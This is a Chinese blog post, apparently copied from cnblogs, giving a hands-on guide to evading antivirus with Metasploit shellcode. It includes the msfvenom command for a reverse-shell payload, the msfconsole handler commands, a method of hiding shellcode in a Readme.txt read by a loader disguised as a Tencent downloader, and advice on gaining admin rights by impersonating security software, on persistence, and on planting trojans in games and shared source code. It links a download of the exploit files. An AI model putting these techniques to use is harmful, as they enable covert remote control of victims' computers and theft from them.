zoukankan      html  css  js  c++  java
  • shellcode超级免杀

    shellcode超级免杀

    作者声明: 本文章属于作者原创,不能转载,违反网络安全法自己承担.这里只供学习使用.
    日期: 2019-12-31
    实验视频链接: https://www.youtube.com/watch?v=TVN3AOsgvA8&list=PLHxmmOLhBykSVS5buN9VZbhjMR-8K0e34&index=3&t=739s

    我试过了电脑管家,火绒安全,McAfee,360, 但只有360使用手动云查杀时木马才能查出来 (目前所有软件都无法查杀!!!!! 2020-1-2)
    从2019-12-29日早上起,我向我的PE-tools工具里写了一个功能,就是shellcode注入功能,写好之后,发现虽然shellcode能注入,但是不能免杀,于是采用各种加密技巧,还是没能逃脱火绒,我绞尽脑汁的想,使用dll注入,dll注入虽然能逃脱免杀,payload反弹时,可是不能交互了.我就采用一种更笨的方法,就是程序运行时加载一下shellcode文件,试了一下成功免杀.好废话不多说,咱们开始!!!!

    效果图

    enter image description here

    演示:

    环境

    Kali (攻击机)
    Win10 (受害机 且安装有各种杀毒软件)
    WinXp (辅助机,只是用来编译源码的)
    

    如何免杀

    免杀效果其实很简单,就是程序启动后加载文件动态运行里面写好的shellcode即可.
    而且还方便替换shellcode不用编译,直接替换文本文件内容即可,且还可以伪装为Readme.txt文件
    可以向Readme.txt乱填入一些声明,将shellcode进行排版,以防被发现..
    可以借助一些软件进行编译你的加载器,修改图标即大小,让对方毫无怀疑...
    

    生成shellcode:

    msfvenom -p windows/meterpreter/reverse_tcp lhost=10.23.92.9 lport=5555 -f c
    lhost后面就是我本地的ip, lport后面时指定的一个端口号.指定好之后,会生成shellcode如下图:
    

    enter image description here

    将生成的shellcode复制粘贴到一个文件里,你也可以直接使用
    msfvenom -p windows/meterpreter/reverse_tcp lhost=10.23.92.9 lport=5555 -f c > a.txt
    那shellcode放在了a.txt文件中了,代开看也更上图一模一样.
    

    写入shellcode:

    得到shellcode之后,我先进行操作,涉及到加载器的源码,我会把它放在末尾来说:
    使用我已经编译后的一个仿真电脑管家下载器,如图:
    

    enter image description here

    一个文件是模拟电脑管家下载器的一个软件,是我编译好的一个文件,后面我会讲它的简单原理与制作
    另一个 Readme.txt就是我们放置shellcode的文件
    我向Readme.txt里写入了一些东西,可以让下载的人这东西只是用来声明的,如图
    

    enter image description here

    使劲回车,然后将自己的shellcode复制到该文件.
    

    enter image description here

    这里我把shellcode藏在了该文件的底部,一般人它也只读前面,后面不会看,看到了也不知道那是啥玩意..
    复制好之后,想方设法将这两个文件仍到你的目标,有很多方法,就不多说了..
    

    实施攻击:

    假如对方已经拿到了,该软件,如图:
    

    enter image description here

    从这里可以知道,静态的反杀已经OK,昨天使用的各种加密手段,还是没能逃脱火绒的魔抓,这个方法还可以,看一下Readme.txt
    

    enter image description here

    往下拉看一下shellcode:
    

    enter image description here

    如果觉得shellcode太显眼,你可以对它进行base64加解密就行.
    
    在kali中输入 msfconsole
    进入之后如图:
    

    enter image description here

    依次输入以下命令
    #msf5> use exploit/multi/handler
    #msf5> set payload windows/meterpreter/reverse_tcp
    #msf5> set lhost ip   (这里填你的攻击机上的ip) 
    #msf5> set lport port (这里填生成shellcode时的端口)
    #msf5> exploit -j    (后台监听)
    
    如图:
    

    enter image description here

    当对方点击QQPCDownload运行时即可得到shell.
    

    enter image description here

    看到了一个session 开启了输入 session -i 1 (1就是开启号) 进行交互.输入sysinfo
    

    enter image description here

    咱们使用火绒来边扫描边控制吧...
    

    enter image description here

    可以看到,完全杀不到.....好了演示结束,接下来就是讲讲加载器咋写吧.
    

    加载器咋写:

        根据网络安全法律,不公布
    

    伪装

    可以使用,extraicohs工具提取任意一个exe文件的图标,提取之后,在vc6中添加图标进行编译
    然后再使用我开发的一个工具调整一下加载器的大小.
    

    enter image description here
    我做了几个游戏,游戏里就包含了木马,然对方直接不知道这个有病毒.还有一种方式更加伪装.
    分享啥啥源码,比如我做的一个贪吃蛇游戏,若对方得到源码,只要对方编译运行,即可中招..
    为了安全着想,我不分享我做的木马....,但原理我已经说了,十分简单..
    可以提取如图:

    enter image description here

    使用Pe_tools增加大小, 如图:
    

    enter image description here

    写入到c盘,若为win10电脑,写入到其他磁盘.
    

    enter image description here

    实现可以控制任意一台中木马的电脑.

    买一个服务器,选择debian,然后安装metasploit框架,既可以实现控制任意一台中木马的电脑....
    

    如何获取管理员权限

        侵入对方后,看一下他的安全软件,然后使用木马冒充安全软件,在开发木马时,设置一下运行的权限为管理员即可
        然后运行该木马,这时就会出现一个管理员权限的请求,一般情况下,用户都很信任安全软件获取管理员权限,则点击是.
        然后c盘随你玩了
    

    如何设置后门

        要想实现长期控制,就得给对方上传开机自的木马...,我已经做好了,且根据对方的杀毒软件做的一个白加黑.
        杀毒软件和使用者毫无察觉,为了不让自己进局子,我不会发给别人..
    

    源码下载 + 测试文件:

    实验工具下载: https://files-cdn.cnblogs.com/files/lyxf/exploit.zip
  • 相关阅读:
    Java 简单算法--打印乘法口诀(只使用一次循环)
    Java简单算法--求100以内素数
    ubuntu 16.04 chrome flash player 过期
    java 网络API访问 web 站点
    java scoket (UDP通信模型)简易聊天室
    leetcode1105 Filling Bookcase Shelves
    leetcode1140 Stone Game II
    leetcode1186 Maximum Subarray Sum with One Deletion
    leetcode31 Next Permutation
    leetcode834 Sum of Distances in Tree
  • 原文地址:https://www.cnblogs.com/lyxf/p/12124925.html
Copyright © 2011-2022 走看看